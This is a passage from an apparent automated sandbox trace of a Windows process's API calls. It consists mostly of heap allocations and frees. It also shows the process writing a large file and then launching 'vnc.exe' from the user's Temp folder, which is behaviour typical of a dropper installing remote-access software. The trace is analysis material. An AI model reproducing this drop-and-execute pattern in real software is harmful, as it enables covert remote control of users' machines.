dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x23c [0122.909] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x133c8a0 | out: hHeap=0x12c0000) returned 1 [0122.910] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0122.910] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0122.910] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0122.910] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0122.910] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0122.910] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3c0 | out: hHeap=0x12c0000) returned 1 [0122.910] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0122.910] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.910] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0122.910] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0122.910] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0122.910] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1e0 | out: hHeap=0x12c0000) returned 1 [0122.910] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.910] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0122.910] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.910] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458958 | out: hHeap=0x12c0000) returned 1 [0122.910] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.910] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0122.910] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0122.910] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0122.911] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.911] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b18 | out: hHeap=0x12c0000) returned 1 [0122.911] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.911] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491998 | out: hHeap=0x12c0000) returned 1 [0122.911] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0122.911] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0122.911] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.911] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0122.916] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0122.916] WriteFile (in: hFile=0x23c, lpBuffer=0x14bffb0*, nNumberOfBytesToWrite=0x65600, lpNumberOfBytesWritten=0x7dfa44, lpOverlapped=0x0 | out: lpBuffer=0x14bffb0*, lpNumberOfBytesWritten=0x7dfa44*=0x65600, lpOverlapped=0x0) returned 1 [0122.926] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0122.926] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bffb0 | out: hHeap=0x12c0000) returned 1 [0122.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0122.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1e0 | out: hHeap=0x12c0000) returned 1 [0122.929] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0122.930] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0122.930] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff1e0 [0122.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0122.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0122.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0122.930] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0122.930] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0122.930] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0122.930] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1e0 | out: hHeap=0x12c0000) returned 1 [0122.930] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff2d0 [0122.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0122.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef720 [0122.930] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0122.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1301068 [0122.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4c0 [0122.931] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0122.931] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0122.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0122.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0122.931] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c98 | out: hHeap=0x12c0000) returned 1 [0122.931] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.931] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff348 [0122.931] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0122.931] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0122.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0122.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0122.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff348 | out: hHeap=0x12c0000) returned 1 [0122.931] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.931] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0122.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0122.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919d8 [0122.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0122.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0122.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0122.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458898 [0122.932] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458898 | out: hHeap=0x12c0000) returned 1 [0122.932] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0122.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0122.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918f8 [0122.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918f8 | out: hHeap=0x12c0000) returned 1 [0122.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0122.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0122.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0122.932] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff1e0 [0122.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0122.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0122.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.933] CloseHandle (hObject=0x23c) returned 1 [0122.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd610 | out: hHeap=0x12c0000) returned 1 [0122.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0122.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1303e48 | out: hHeap=0x12c0000) returned 1 [0122.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0122.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0122.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0122.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff460 | out: hHeap=0x12c0000) returned 1 [0122.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0122.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1e0 | out: hHeap=0x12c0000) returned 1 [0122.946] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0122.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458818 | out: hHeap=0x12c0000) returned 1 [0122.946] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0122.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0122.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491838 [0122.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491838 | out: hHeap=0x12c0000) returned 1 [0122.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0122.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0122.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458818 [0122.948] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0122.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0122.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a58 [0122.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a58 | out: hHeap=0x12c0000) returned 1 [0122.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0122.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0122.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14589d8 [0122.948] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff1e0 [0122.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0122.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0122.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0122.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0122.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b18 [0122.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0122.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0122.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x50) returned 0x1490620 [0122.949] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0122.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0122.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc0) returned 0x133c8a0 [0122.949] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1490620 | out: hHeap=0x12c0000) returned 1 [0122.950] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0122.950] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b18 | out: hHeap=0x12c0000) returned 1 [0122.950] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0122.950] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0122.950] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0122.950] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0122.950] ShellExecuteExW (in: pExecInfo=0x7dfa18*(cbSize=0x3c, fMask=0x40, hwnd=0x0, lpVerb="", lpFile="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\vnc.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x7dfa18*(cbSize=0x3c, fMask=0x40, hwnd=0x0, lpVerb="", lpFile="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\vnc.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x398)) returned 1 [0123.808] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0123.808] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0126.577] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0126.577] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0127.328] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0127.328] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0128.294] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0128.295] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0128.842] GetProcessId (Process=0x398) returned 0xaf4 [0128.843] CloseHandle (hObject=0x398) returned 1 [0128.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0128.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0128.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x133c8a0 | out: hHeap=0x12c0000) returned 1 [0128.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0128.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0128.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0128.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1e0 | out: hHeap=0x12c0000) returned 1 [0128.843] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0128.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14589d8 | out: hHeap=0x12c0000) returned 1 [0128.843] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0128.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458818 | out: hHeap=0x12c0000) returned 1 [0128.843] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0128.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14a3580 | out: hHeap=0x12c0000) returned 1 [0128.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0128.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd430 | out: hHeap=0x12c0000) returned 1 [0128.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0128.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff028 | out: hHeap=0x12c0000) returned 1 [0128.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x154cd98 | out: hHeap=0x12c0000) returned 1 [0128.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0128.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0128.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd448 | out: hHeap=0x12c0000) returned 1 [0128.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0128.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff050 | out: hHeap=0x12c0000) returned 1 [0128.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5f8 | out: hHeap=0x12c0000) returned 1 [0128.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0128.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0128.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0128.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3e8 | out: hHeap=0x12c0000) returned 1 [0128.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0c8 | out: hHeap=0x12c0000) returned 1 [0128.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0128.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0a0 | out: hHeap=0x12c0000) returned 1 [0128.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0128.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0128.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0128.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0128.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0128.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0128.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1301068 | out: hHeap=0x12c0000) returned 1 [0128.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0128.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff2d0 | out: hHeap=0x12c0000) returned 1 [0128.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0128.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd658 | out: hHeap=0x12c0000) returned 1 [0128.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0128.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0128.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0128.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0128.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0128.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0128.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1490b48 | out: hHeap=0x12c0000) returned 1 [0128.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0128.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd910 | out: hHeap=0x12c0000) returned 1 [0128.852] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4a8 | out: hHeap=0x12c0000) returned 1 [0128.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1b8 | out: hHeap=0x12c0000) returned 1 [0128.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0128.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff078 | out: hHeap=0x12c0000) returned 1 [0128.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd628 | out: hHeap=0x12c0000) returned 1 [0128.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0128.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0128.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0128.853] HeapFree (in: hHeap=0x12c0000, 